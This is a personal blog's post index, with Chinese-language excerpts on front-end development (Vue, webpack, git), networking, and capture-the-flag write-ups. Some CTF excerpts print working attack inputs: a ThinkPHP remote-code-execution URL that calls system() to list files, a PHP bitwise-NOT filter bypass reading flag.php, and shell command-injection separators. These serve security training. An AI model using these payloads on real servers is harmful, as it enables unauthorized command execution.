Rashu99's blog

原创 git 把master分支上的代码提交到main分支上

git 提交代码默认是master分支，改回main分支上

原创 防抖节流的简单实现

文章目录前言一、防抖测试二、节流测试三、防抖的业务场景：四、节流的业务场景前言防抖debounce，好比坐电梯，进来一个人，就得多等几秒。节流throttle，好比等红绿灯，时间一到，就过一批人。时间没到多来一个人也不影响。HTML+CSS <h2>防抖</h2> <div id="div1">0</div> <p></p> <h2>节流</h2> <div id="div2

原创 圣杯布局和双飞翼布局 margin-left:-100%

文章目录前言一、圣杯布局1、先写middle2、container设置padding ，预留位置给左右3、middle设置宽度100%4、left、right设置固定宽度200px5、给中左右设置浮动（一浮都浮）6、给left设置margin-left:-100%7、接着给right设置margin-left: -200px8、给left设置position: relative; 再设置right:200px9、优化下细节二、双飞翼1、middle外多封装了一层div2、wrap(父级)上设置宽度100%3

原创 项目开发（5）

详情页导航栏和内容对应点击导航栏滚动到对应的位置

原创 项目开发（4）

详情页在goodsItem里 加上@click=“itemClick”在route文件夹index.js里和之前写的一样 复制粘贴path component这样 点击图片时就会跳转到新的页面详情页 之前views只有四个 新增一个Detail.vue使用push可以点击浏览器back 回到首页...

原创 项目开发（3）

使用better-scroll 进行滚动时 是根据scrollerHeight属性决定的scrollerHeight属性是根据content 中子组件的高度但是在计算scrollerHeight属性时没有计算图片的高度所以计算出来一开始是1300+ 是错误的后来图片加载完了有了新的高度 但是scrollerHeight属性没有更新所以滚动出现了问题所以需要图片加载完就执行一次scroll里的refresh()刷新每张图片都加载完成那怎么监听图片是否加载完成原生的js监听图片 img.οn

原创 项目开发(2)

首页开发Featurefeature 特征其实是一张图片上下滚动时 要保证 “购物街” 也就是 nav-bar 固定不动 一直显示在最上方还有个问题 图片被遮住了直接在home离给个padding-bottom 40px 就好了

原创 连续抛硬币，出现【反反正】你赢，出现【正反反】我赢

假设一天抛10000次，连续抛十天可以看到我的钱 始终比你的多说明【正反反】的概率比【反反正】大一是因为前两次正反比反反更容易出现，因为有人做过实验，最后统计出来正面出现的概率确实是反面大二是因为要想出现【反反正】之前一定会出现【正反反】比如 正反反反反正 正正反反正三是计算概率如果只抛三次 那么概率是一样的 1/8 每次都是二分之一的三次方但是抛很多次的话只要出现【反反】 如果下一次是反就一直抛硬币 直到出现正 你赢游戏才结束 然后重新开始反过来说 只要不出现【反反】 .

原创 vscode安装git以及项目开发(1)

下载git链接next完后打开vscode，文件->首选项->设置->用户配置加上git安装路径下的Git文件夹下的cmd的git.exe

原创 PS把图片变透明做logo

Adobe Photoshop 2020左上角点击选择 选择 色彩范围颜色容差改为200 点击一下图片 然后ctrl+shift+I 反选 后 按 delete导出为png图片wps打开图片 选择右下角修改尺寸175*56 左右的图片

原创 Vuex：state，mutations，actions，getters，modules/网络模块封装axios

Action-State-Viewvue init webpack vuextestnpm install vuex --save创建store 文件夹 以及index.js因为在Vue实例下挂载了store 所以有$store属性 可以使用$store.state.counter

原创 promise

书接上文 tabbar

原创 tabbar 首页/分类/购物车/我的 组件开发

创建项目vue init webpack tabbar创建css文件 公共的导入css文件@import 路径没提示解决办法"@": "${workspaceRoot}/src"创建jsconfig.json{ "compilerOptions": { "target": "ES6", "module": "commonjs", "allowSyntheticDefaultImports": true, "baseUrl": "./.

原创 vue-router (2)

生命周期函数导航守卫动态修改document.title网页标题是通过 title 来显示的 但是SPA只有一个固定的HTML切换不同的页面时 标题不会改变可以在每一个路由对应的.vue文件中 通过mounted声明周期函数 但是这样不好维护更好的方法使用导航守卫beforeEach的三个参数to from nextafterEach的三个参数to from路由独享守卫在路由配置上组件内守卫keep-alive保留状态 避免重新渲染Home.vue里的生命周

原创 vue-router

阶段后端路由由服务器渲染好页面 传给前端显示缺点是整个页面的模块都是后端写跟维护的，而且如果前端开发人员要开发，要用php和Java写代码，同时HTML与数据结合在一起很混乱前后端分离后端只负责提供数据 通过API返回数据前端写js代码在浏览器渲染单页面富应用SPA在前后端分离的基础上加了一层前端路由前端来维护一套路由规则改变URL 但是页面不刷新HTML5的historylocation.hash = 'aaa' 修改URL history.pushState

原创 Vue Cli脚手架

command-line interface 命令行界面 俗称脚手架Vue Cli是一个官方发布vue.js项目脚手架使用Vue Cli 可以快速搭建vue开发环境以及对应的webpack配置使用vue.js 开发大型应用时，需要考虑代码目录结构、项目结构和部署、热加载、代码单元测试前提 安装node 和 webpack （已经装好了）如果觉得npm install 慢 可以用cnpm 是淘宝镜像npm install -g cnpm --registry=https://registr

原创 webpack之plugin

loader 和 plugin 区别loader 加载 转换某些类型的模块plugin 插件 对webpack本身的扩展添加版权声明的plugin

原创 webpack配置vue（2）

webpack配置vue安装vue npm install vue --save在main.js里 导入vue 创建vue实例3. 在webpack.config.js里加上 alias 别名 意思是以vue结尾的 去找vue下的dist下的vue.esm.js vue目录是刚才装在node包里如果不写这个 就会报错意思是runtime-only 这个版本 代码中不能有任何的template 虽然没有定义< template > 但是 挂载的app 相当于 vu

原创 webpack的安装、配置（1）

webpack的安装安装node.js https://www.runoob.com/nodejs/nodejs-install-setup.html 自带软件包管理工具npm查看node版本 node -v全局安装webpack npm install [email protected] -g 3.6.0版本因为vue cli 2 依赖此版本局部安装 cd 对应目录 npm install webpack --save-dev --save-dev 是开发时依赖 项目打包后不再继续使用在终端直接

原创 前端学习/ Day1/HTTP简单易懂/GET POST/HTTP特性/HTTP与HTTPS/HTTP版本演变/加解密数字签名数字证书

How Does The Internet Work ?假设有十台电脑 每个电脑有9个插口那么需要45根网线太麻烦如果把这些电脑都连到一台路由器上那么只需要10根网线如果要连接成百上千台电脑那就需要路由器连路由器有点接近互联网了在家里我们会发现有根线接了进来电话????电话也是一种网络为了连接这种网络需要调制解调器就是 modem可以把网络信息变成modem可以处理的信息反之亦然所以我们可以 modem 连 modem为了把信息从我们的网络发到我们想要到达的地方需要把网

原创 优先级映射

eNSP1、在RTA上创建vlan、vlanif接口，并配置trunk，使用户能通过RTA访问WAN侧网络2、在RTA上配置端口信任的报文优先级为信任报文的802.1p优先级3、在RTA上配置优先级映射表，修改802.1p优先级与DSCP优先级之间的映射关系，使设备能根据要求按照报文的802.1p优先级为其修改不同的DSCP优先级值。RTA （AR1220）vlan batch 20 30qos map-table dot1p-dscp input 2 output 14 input

原创 isis net地址

原创 flag_in_your_hand 告诉你个秘密python

flag_in_your_hand1打开附件中的html网页查看源代码发现以下信息再打开js文件发现以下信息一开始我示图找s.charCodeAt这个是什么，然而并没有发现什么然后灵机一动已知a[i]的值，也知道3那不就知道了s.charCodeAt(i)=a[i] - 3这！！害最后再用chr()转一下就能得到flag了flag_in_your_hand一样打开html 和上题一样不过我刚才没发现 但是我也测试过 点击按钮会返回一串字符串然后再打开js，额这题跟上一题一模

原创 转轮机加密 （有趣）

转轮机加密拿到题目，已知共有13行，n列，密钥，密文提示：托马斯·杰斐逊百度知道了他是美利坚合众国第三任总统。。。。。。结合题目知道了美国总统的加密方法！一个轮转到一圈后第二个轮才转动一个！以此类推，假设有三个轮，每个轮上有26个字母，那么一共需要转动多少次转轮能回到原始状态？抢答！ 26^3次方那么，已知密文的情况下，要怎么通过密钥得到明文呢？容我思考一下下…首先，密文肯定在这些转轮上眼要瞎了…但是我还是看到了最后一个密文P 在最后一行的最后一个并且发现 每一行的字母竟然不重复

原创 easychallenge反编译 分析代码

easychallengepyc文件是python编译后的文件 所以第一步1、先反编译 安装uncompyle6pip install -i https://pypi.doubanio.com/simple/ uncompyle62、win+R cmd 打开 切换到pyc所在目录输入 uncompyle6 xxx.pyc3、得到反编译后的py文件代码# uncompyle6 version 3.7.4# Python bytecode 2.7 (62211)# Decompiled

原创 Railfence、不仅仅是Morse、混合编码、幂数加密、easy_RSA、Normal_RSA(新手详细!!!)

Railfence在线W型栅栏解密不仅仅是Morse密码机器网页解码在线培根解密混合编码在线base64解码Unicode解码再次base64或者用站长之家base64直接然后同上在按一次base64我想找在线ASCII转字符 但是只能一个一个转或者自己按照表格对 或者 跑脚本...

原创 unserialize3 反序列化

参考blog攻防世界 web进阶 unserialize3 题目运行得到重点关注被序列化的对象属性个数当序列化字符串当中属性个数值大于实际的属性个数时,就会导致反序列化异常,从而跳过__wakeup函数与序列化和反序列化的魔术方法主要是：__construct() //当一个对象创建时被调用__destruct() //对象被销毁时触发__wakeup() //使用unserialize时触发__sleep() //使用serialize时触发__toString() /

原创 2古典密码

古典密码移位密码曲路密码云影密码栅栏密码替代密码1、单表**凯撒****ROT13**Atbash Cipher单表替代培根密码猪圈密码跳舞的小人仿射密码2、多表移位密码例题 m=flag k=3124明文 1234密文 3124flaglafg加密def shift_encrypt(m,k): l=len(k) c="" for i in range(0,len(m),l): tmp_c=[""]*l if i+l>len(m): tmp_m=m[i:]

原创 1编码

编码传输前将信息编码，传输后再解码hex每个字符的ASCII码的十六进制字符编码成16进制转10进制即字符串转十进制s="flag"t=s.encode("hex")print int(t,16)单字符最快转换用ordprint int("a".encode("hex"),16)print ord("a")去掉0x和末尾的Lnum=584734024210391580014049650557280915516226103165print hex(num)[2:-1].deco

原创 哈希碰撞

哈希1、任意长度的输入，通过哈希算法，得到固定长度的输出2、不同的输入会哈希成相同的输出3、不能从输出倒推输入（但是目前md5可以破解）哈希函数有md5、sha1、sha256哈希碰撞import hashlibprint hashlib.sha256("hello").hexdigest()print hashlib.md5("hello").hexdigest()print hashlib.sha1("hello").hexdigest()输出王小云院士提出的哈希函数碰撞攻

原创 RSA学习2 —— 公钥密码

小指数明文爆破如果B使用的e很小，如e=3，且A传给B的明文也很小，如几个字节那么，c = m^ e mod n 如果n很大 则可能 c = m^ e 即 c=m^ 3 即对c开三次根号就可以得到m如果m的三次方大于n但是没有超过太多即 k*n <m^3 < (k+1)*n且k是可以爆破的大小k*n - c = m^3n=4796670818328963996250136316376186439945424169101446717280565851836842313516

原创 RSA 学习记录

A向B广播一条消息：B，我有要事汇报B立即生成两个大素数，p,q 算出n=p*q并取一个素数 e=65537广播 n,e 即加密密钥A收到了n,e 攻击者也收到了n,eA立即将情报通过hex和padding 转换成一串数字 m算m^e mod n = c 即 c = pow(m,e,n)此时 A手上有 n,e,m,c 想把c传给B广播通信出去 B 收到了c 攻击者收到了c目前A 有 n,e,m,cB 有 p,q,n,e,c攻击者 有 n,e,cB 比攻击者多了

原创 攻防世界 web baby_web

Training-WWW-Robots 这题跟新手区的robots题解法差不多 新手区

原创 2020第五空间 hate-php rosb 交流

hate-php取反绕过对字母和数字的过滤php在线运行<?phpecho urlencode(~'highlight_file'); //%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9Aecho "\n";echo urlencode(~'flag.php'); //%99%93%9E%98%D1%8F%97%8F?>/?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%9

原创 python3 学习记录 day3 day4

Day 3#类和对象class Person: def __init__(self,name,sex,birthday): self.name=name self.sex=sex self.birthday=birthday def say(self,word): print(f'{self.name}：“{word}”')tom = Person('Tom','male','20200202')cat = Perso

原创 python3 学习记录

day1new file调字体 configure IDLErun module看python内置函数变量 variable支持中文变量字符串 string单引号 双引号 转义字符 \Alt + P 返回上一条语句\ 放在末尾表示这句还没完\n\ 能换行“”” “”" 三个双引号也能换行数组s='12345'print(s[-1]) # 5print(s[1]) # 2print(s[0:4:2]) # 13print(s[

原创 pycharm 安装 wordcloud cmd窗口 报错 line 360, in _error_catcher yield

报错的原因很大可能是路径错了我走过的弯路————在这个路径下去pip install 只可能报错或者 发现这只是快捷方式又或者而真正的运行程序.exe 我是win+q 搜索python.exe 才发现这是对的路径然后把 .whl 解压缩成两个文件夹放到pycharm所以为什么可以从很多路径去打开python 。。好乱...

原创 攻防世界 web php_rce emmm

漏洞原理/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%2

原创 攻防世界web simple_js chr() 用法 python3

simple_js查看源代码ASCII码的十六进制转成十进制口算好像也不难 55，56，54，79，115，69，··········那还是用python吧pycharmpython3s="\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"c=s.sp

原创 攻防世界 web command_execution 命令执行漏洞的原理

命令执行漏洞的原理：在操作系统中，“&、|、||”都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令一开始没有经验ping了公网地址看看 结果不通然后试了下本地地址常见连接符A;B 先执行A再执行BA&B 简单拼接A&&B A执行成功后才会执行BA|B 显示B的执行结果A||B A执行失败才会执行B参考链接...